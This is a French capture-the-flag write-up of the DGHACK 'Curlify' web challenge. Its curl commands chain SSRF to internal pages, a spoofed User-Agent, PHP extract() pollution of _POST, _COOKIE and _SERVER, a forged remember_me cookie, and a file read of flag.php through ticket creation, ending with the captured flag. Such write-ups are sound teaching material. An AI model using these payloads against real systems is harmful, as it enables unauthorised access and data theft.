# Curlify

## Description

Vous avez été contacté dans le cadre d'un programme de bug bounty pour auditer l'appli `Curlify` en preprod et valider sa robustesse avant son déploiement en Production.

> Objectif: Lire le flag dans le fichier flag.php

La DSI nous indique que les administrateurs sont très réactifs dans le traitement des tickets.

Lien : http://curlify3.chall.malicecyber.com/


## Solution

On arrive sur la page suivante :

![](home.png)

Un champ de saisie qui propose de faire un curl (la commande ? La librairie PHP ?) sur une URL. On tente différente URLs, mais ça répond «not yet implemented».

Le code source affiche un lien :
```html
                       <!--                <div class="navbar-item">-->
                        <!--                    <a href="dev.php">Developer panel</a>-->
                        <!--                </div>-->
```

On essaie de s'y rendre, mais on a une erreur «Internal access only !». Ça sent la [SSRF](https://portswigger.net/web-security/ssrf) ! 
Pour rappel, le principe d'une SSRF est d'utiliser le service proposé pour faire la requête à notre place. À priori, il est est *internal*, lui. :)
On saisie donc l'url http://127.0.0.1/dev.php dans l'interface et :

![](code_zip.png)

On utilise le répertoire proposé [en direct](http://curlify3.chall.malicecyber.com/536707b92) et ça nous permet de télécharger [un zip](Code.zip.bak) qui contient le code source de la partie [`admin_panel`](admin_panel/) du site.

[Cette partie du site](http://curlify3.chall.malicecyber.com/admin_panel/) nous est également inaccessible avec l'erreur «Internal Access Only». Qu'à cela ne tienne, utilisons curlify :

```console
$ curl http://curlify3.chall.malicecyber.com/index.php -d 'url=http://127.0.0.1/admin_panel/index.php' 
<div class="notification is-danger">Blocked by WAF !</div></code></pre>
```

En effet, on observe dans [firewall.php](admin_panel/firewall.php) que l'accès est régi par l'utilisation d'un User-Agent spécifique. Si on l'utilise, l'interface curlify le propage-t-elle ?

```console
$ curl http://curlify3.chall.malicecyber.com/index.php -d 'url=http://127.0.0.1/admin_panel/index.php' -A 'DGHACK/1.0 (Curlify)
<div class="notification is-danger">Access Denied</div>
```

On avance : `Access Denied` signifie que l'on n'est pas connecté ! En regardant [index.php](admin_panel/index.php), on remarque deux possibilités pour être connecté :
- la soumission d'un login et d'un mot de passe par `POST`.
- la soumission d'un login par `POST` avec un cookie `remember_me`.
  
L'archive contient bien [un fichier SQL](admin_panel/database.sql) avec un hash, mais on se rend compte rapidement qu'un bruteforce n'est pas envisageable. 

En fait, la clef se situe à la ligne :
```php
    extract($_GET);
```

Comme l'indique la [documentation PHP](https://www.php.net/manual/fr/function.extract.php), il s'agit d'une fonction dangereuse, car elle permet à un attaquant de polluer tout l'environnement si elle est utilisée avec des données non sûres, comme les entrées utilisateurs par exemple, et `$_GET` en particulier.

On va donc l'utiliser pour positionner le login en `POST` et le cookie `remember_me`. :)
```console
$ curl http://curlify3.chall.malicecyber.com/index.php -d 'url=http://127.0.0.1/admin_panel/index.php?_POST[username]=admin%26_COOKIE[remember_me]=plop' -A 'DGHACK/1.0 (Curlify)' 
<div class="notification is-danger">Invalid remember_me cookie</div>
```

Ça a fonctionné ! Il nous faut maintenant un cookie valide. C'est facile, sa construction est décrite dans [utils.php](admin_panel/utils.php) par la concaténation du nom de l'utilisateur avec le MD5 de... la chaîne littérale 
`$SECRET_KEY` (probablement l'erreur d'un développeur !). 

```console
$ curl http://curlify3.chall.malicecyber.com/index.php -d 'url=http://127.0.0.1/admin_panel/index.php?_POST[username]=admin%26_COOKIE[remember_me]=admin7a988e11680f9e151f6f46808690d5ca' -A 'DGHACK/1.0 (Curlify)' 
<div class="notification is-success">Welcome back <strong>admin</strong></div>
```

Nous voilà admin ! On va maintenant pouvoir s'intéresser à la lecture du flag présent dans le fichier [`admin_panel/user_prefs/flag.php`](admin_panel/user_prefs/flag.php). Le script [prefs.php](admin_panel/prefs.php) nous indique que le fichier peut être chargé par `get_prefs()` si on parvient à positionner le paramètre `$lang` :

```php
function get_prefs($user, $prefs, $lang) {
    switch ($prefs) {
        case "fr-FR":
            include(__DIR__."/user_prefs/fr-FR.php");
            break;
        case "en-EN":
            include(__DIR__."/user_prefs/en-EN.php");
            break;
        case "us-US":
            include(__DIR__."/user_prefs/us-US.php");
            break;
        default:
            return file_get_contents(__DIR__."/user_prefs/$lang");
    }
}
```

`get_prefs()` est appelé lors de la connexion avec le cookie `remember_me`, et vaut `$DEFAULT_LANGUAGE` (écrasable par `extract()`) à condition que le header `HTTP_ACCEPT_LANGUAGE`  ne soit pas positionné (faisable de la même manière):

```php
$_SESSION["user_prefs"] = get_prefs($userinfo["username"], $_SERVER["HTTP_ACCEPT_LANGUAGE"], $DEFAULT_LANGUAGE);
```

Reste à afficher le contenu de `$_SESSION["user_prefs"]`. On note que sa valeur est écrite lors de la création d'une tâche dans [task.php](admin_panel/task.php) :

```php
        if (!in_array($_POST["author"], $list_username) || !in_array($_POST["type"], $list_type) || !in_array($_POST["assignee"], $list_username))
            return '<div class="notification is-danger">Invalid data</div>';
        else {
            $content = "=== Ticket N° $ticket_id ===\n";
            $content .= "Creation Date: $date\n";
            if ($_SESSION["userid"]) {
                $content .= "UserId: " . $_SESSION["userid"] . "\n";
                if ($_SESSION["user_prefs"]) $content .= "Preferences: " . $_SESSION["user_prefs"] . "\n";
            }
            $content .= "Author: " . $_POST["author"] . "\n";
            $content .= "Assignee: " . $_POST["assignee"] . "\n";
            $content .= "Description: " . $_POST["description"] . "\n";
        }
```

La tâche est un fichier généré dans le répertoire `tasks/` mais n'est pas directement lisible à cause du [`.htaccess`](admin_panel/tasks/.htaccess). Mais on peut utiliser la dernière fonctionnalité encore non utilisée du challenge : la possibilité d'afficher la source d'un fichier.

```php
    if (isset($source)) {
        $path = realpath("/var/www/html/admin_panel/" . $source);
        if (strpos($path, "/var/www/html/admin_panel/") === 0 && !strpos($path, "flag.php")) {
            show_source("/var/www/html/admin_panel/" . $source);
            die();
        }
    }
```

Il va falloir être rapide car le numéro du ticket est aléatoire et on nous dit que les tâches sont rapidement traitées. Moins de 5 secondes selon l'énoncé, mais visiblement plus court d'après les discussions dans le Discord. :) On va donc scripter les actions suivantes :
- création d'une session admin avec le `remember_me` et en positionnant `flag.php` comme language.
- création d'un ticket.
- lecture du ticket avant sa destruction.

Le tout donne [ce script python](exploit.py) et à l'exécution :
```console
[+] Get a session
	POST url=http://127.0.0.1/admin_panel/?_POST[username]=admin&_COOKIE[remember_me]=admin7a988e11680f9e151f6f46808690d5ca&_SERVER[Accept-Language]=&DEFAULT_LANGUAGE=flag.php&_SESSION[userid]=admin
	Session: PHPSESSID=a06en2jsfd73idkcppqci3hgur
{+] Create a task
	POST {'author': 'admin', 'type': 'bug', 'assignee': 'admin', 'description': 'plop'}
	Ticket ID: 4089
{+] Read ticket
	POST url=http://127.0.0.1/admin_panel/?source=tasks/task_4089.txt
	=== Ticket N° 4089 ===
	Creation Date: 2022-11-24 16:54:32
	UserId: admin
	Preferences: <span style="color: #0000BB">&lt;?php
	
	$flag </span><span style="color: #007700">= </span><span style="color: #DD0000">"DGHACK{SsRF_iNs3CuR3_4dMin_P4n3l_F0r_FuN}"</span><span style="color: #007700">;
	
	</span><span style="color: #0000BB">?&gt;
	</span>
	Author: admin
	Assignee: admin
	Description: plop

```
